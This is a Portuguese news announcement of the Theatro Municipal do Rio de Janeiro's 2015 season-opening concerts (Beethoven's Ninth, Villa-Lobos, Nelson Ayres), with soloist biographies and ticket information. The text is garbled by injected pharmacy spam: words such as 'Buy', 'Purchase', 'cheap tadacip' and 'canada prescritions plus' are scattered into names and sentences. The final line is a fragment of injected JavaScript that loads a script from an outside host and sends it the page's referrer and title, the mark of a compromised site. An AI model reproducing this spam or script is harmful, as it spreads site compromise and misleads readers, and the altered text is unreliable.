Música coralMúsica sinfônicaNotíciaProgramaçãoRio de Janeiro

Abertura da temporada 2015 do Theatro Municipal do RJ

Buy Karabtchevsky conduz coro e orquestra sinfônica do TM em obras de Villa-Lobos e Beethoven.

 

O Theatro Municipal do Rio de Janeiro escolheu Beethoven para abrir sua temporada 2015. A célebre online Nona Sinfonia será apresentada – o quarto movimento (Ode à Alegria) e na íntegra – nos concertos inaugurais da programação do ano.

O primeiro concerto, chamado Rio 450 anos, em homenagem ao aniversário da cidade, realiza-se no dia 2 de março, às 20h. Coro e Orquestra Sinfônica do Theatro Municipal do RJ, regidos pelo maestro e recém-empossado presidente da Fundação Teatro Municipal, Purchase Isaac Karabtchevsky, serão acompanhados pelos solistas Annemarie Kremer (soprano), Denise de Freitas (mezzo-soprano), Jacek Laszczkowski (tenor), Kay Stiefermann (barítono) e José Staneck (gaita). A apresentação tem ainda participação especial do Coral Infantil da UFRJ, preparado pela maestrina Maria José Chevitarese.

No programa estão duas composições de Heitor Villa-Lobos – Concerto para Harmônica e Orquestra e Mandú-Çárárá –, a obra de Nelson Ayres em tributo à Cidade Maravilhosa, Cantos do Rio, e o quarto movimento da Sinfonia nº 9 em ré menor, Op. 125, de Ludwig van Beethoven, mais conhecido como Ode à Alegria.

A programação festiva continua nos dias 4 e 5 de março, também às 20h, com a versão integral da Sinfonia nº 9 em ré menor, de Beethoven. Coro e Orquestra Sinfônica do TM retornam ao palco juntamente com os solistas Kremer, Freitas, Laszczkowski e Stiefermann, também sob a regência de Karabtchevsky.

“Comemorando os 450 anos da cidade do Rio de Janeiro, abriremos a temporada com concertos de onde despontam, como ícones da cultura carioca e internacional, as figuras de Villa-Lobos e Beethoven. Colocá-los no mesmo plano já revela nossa ideia de projetar a universalização de nossa cultura”, comenta o maestro.

 

Sobre os solistas

Annemarie Kremer, soprano

Annemarie Kremer
Annemarie Kremer (foto de Frank Doorhof)

Nasceu na Holanda e estudou no Conservatório Masstricht. Tem se apresentado no Teatro San Carlo de Nápoles, na Ópera de Hong Kong, na Deutche Opera am Rhein e na de Leipzig, na Volksoper de Viena, no Concertgebouw de Amsterdã e na Ópera de Montreal, entre outros. Sua extraordinária musicalidade e a expressividade de sua voz atraíram a atenção da crítica internacional em sua estreia triunfante em Idomeneo. Em 2012, na ópera online Norma, dirigida por Christopher Alden, recebeu inúmeros prêmios, entre eles o International Opera Oscars London, bem como a nomeação Sängerin des Jahres Cheap , pela revista de ópera Opernwelt.

 

Denise de Freitas, mezzo-soprano

Denise de Freitas
Denise de Freitas

Denise exibe qualidade de voz impecável e uma musicalidade extremamente sensível, adjetivo que, no mais, pode-se aplicar às suas interpretações, sempre marcantes, de papéis como Niklaus, nos Les Contes d’Hoffmann; Cherubino, em Le Nozze di Figaro; João, em Hänsel und Gretel, ou no papel-título de La Cenerentola. Em todos, a artista tem chamado a atenção por seu timbre profundo e penetrante, bastante adequado à tessitura de papéis como Dalila, da ópera de Saint-Saëns. Recentemente, teve atuação arrebatadora como intérprete de Suzuki, na ópera Madama Butterfly, no Theatro Municipal do RJ. A versatilidade da cantora espraia-se também pela música de câmara, em que se destaca o brilhante disco gravado ao lado da pianista Eudóxia de Barros dedicado a canções do compositor paulista Osvaldo Lacerda. Denise já foi agraciada com prêmios da Rádio MEC e foi vencedora do 4º Concurso de Interpretação da Canção Brasileira.

 

Jacek Laszczkowski, tenor

Jacek Laszczkowski
Jacek Laszczkowski (foto: MoscickiFoto)

Nasceu na Polônia e estudou canto na Academia de Música Fryderyk Chopin, em Varsóvia, como bolsista do Ministério das Artes e Cultura de seu país. Em sua carreira, destacam-se prêmios nos renomados Concurso Internacional de Vercelli e Concurso Internacional Toulouse, além de apresentações na Ópera de Câmara de Varsóvia, no Queen Elizabeth Hall, em Londres, e no Festival Rossini de Pesaro, entre outros. Em 1996, Jacek estreou no Teatro alla Scala de Milão, seguindo-se apresentações com a Orquestra Nacional de Toulouse, sob a regência de Michel Plasson; no Théâtre des Champs-Elysées, Salle Pleyel, Ópera de Munique, Ópera de Dresden, Ópera de Hamburgo, além de atuações na Holanda, Bélgica, Áustria, EUA e Dinamarca. Seu repertório clássico e contemporâneo inclui inúmeros títulos em óperas como tenor e contratenor.

 

Kay Stiefermann, barítono

Kay Stiefermann
Kay Stiefermann (foto de Joern Kipping)

Nasceu em Dusseldorf, Alemanha, e estudou com Kurt Moll. Após várias apresentações na Ópera de Hamburgo, passou a ser convidado regularmente pela Ópera de Wuppertal, participando de Eugen Onegin, Madama Butterfly Purchase , Die Fledermaus cheap tadacip , Os Contos de Hoffmann, Werther, Peter Grimes, Carmen e Tristão e Isolda. Já se apresentou na WDR Rundfunkorchester e na Deutsche Opera am Rhein, ambas na Alemanha. Suas recentes apresentações foram no Lincoln Center de NY, no Concertgebouw de Amsterdã e na Ópera de Berlim, onde cantou Carmen sob a regência de Daniel Baremboim. Sob a regência do maestro Valery Gergiev, foi solista da Orquestra Filarmônica de São Petersburgo. Suas gravações incluem obras de Haendel, Schubert e Bach, entre outras.

 

José Staneck, gaita

José Staneck
José Staneck

O músico carioca é chamado de David Oïstrakh da harmônica pelo crítico francês Oliver Bellamy. Também foi comparado, pelo crítico Luiz Paulo Horta (1943-2013), aos músicos Andrés Segovia e Mstislav Rostropovich, por sua atuação no desenvolvimento e divulgação de seu instrumento. Staneck tem um estilo próprio, em que elementos tanto da música de concerto como da MPB e do jazz se fundem a serviço de uma sonoridade e expressividade marcante. Em 2007, obteve o título de Mestre em Música pela Universidade Federal do Estado do Rio de Janeiro (UniRio). Como diretor da Musiarte Curso Integrado de Música, durante 15 anos, desenvolveu importante trabalho na área do ensino. Atualmente, viabiliza um trabalho social de inclusão cultural, atendendo a comunidades carentes e projetos sociais, levando o ensino de música por meio da gaita para crianças em diversos locais do Brasil. Atua com diferentes formações camerísticas, e já foi solista de diversas orquestras sinfônicas brasileiras e internacionais.

Foto da Orquestra: Salvador Scofano

 

SERVIÇO: canada prescritions plus

Concerto Rio 450 Anos

Dia 2 de março (segunda), às 20h

 

 

Coro e Orquestra Sinfônica do Theatro Municipal

 

Isaac Karabtchevsky, maestro

Solistas convidados: Annemarie Kremer (soprano), Denise de Freitas (mezzo-soprano), Jacek Laszczkowski (tenor), Kay Stiefernann (barítono) e José Staneck (gaita)

Participação especial: Coral Infantil da UFRJ

 

Programa:

Nelson Ayres – Cantos do Rio

H. Villa-Lobos – Concerto para harmônica e orquestra

H. Villa-Lobos – Mandú-Çárárá, para coro misto, coro infantil e orquestra

L. v. Beethoven – Sinfonia nº 9 em ré menor, Op. 125, quarto movimento

 

Duração: 60 minutos

 

 

Concerto de Abertura da Temporada 2015

Dias 4 e 5 de março (quarta e quinta), às 20h

 

Coro e Orquestra Sinfônica do Theatro Municipal

Isaac Karabtchevsky, maestro

Solistas convidados: Annemarie Kremer (soprano), Denise de Freitas (mezzo-soprano), Jacek Laszczkowski (tenor) e Kay Stiefernann (barítono)

 

Programa:

L. v. Beethoven – Sinfonia nº 9 em ré menor, Op. 125

 

Duração: 60 minutos

 

Preços: R$ 300 (frisas e camarotes), R$ 50 (plateia e balcão nobre), R$ 30 (balcão superior) e R$ 20 (galeria)

Desconto de 50% para estudantes e idosos

Classificação etária: livre

 

Theatro Municipal do Rio de Janeiro (Praça Floriano s/n°, Centro – Rio de Janeiro. Tel.: 21 2332-9191)

Vendas na bilheteria, no site da Ingresso.com ou pelo telefone 21 4003-2330

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;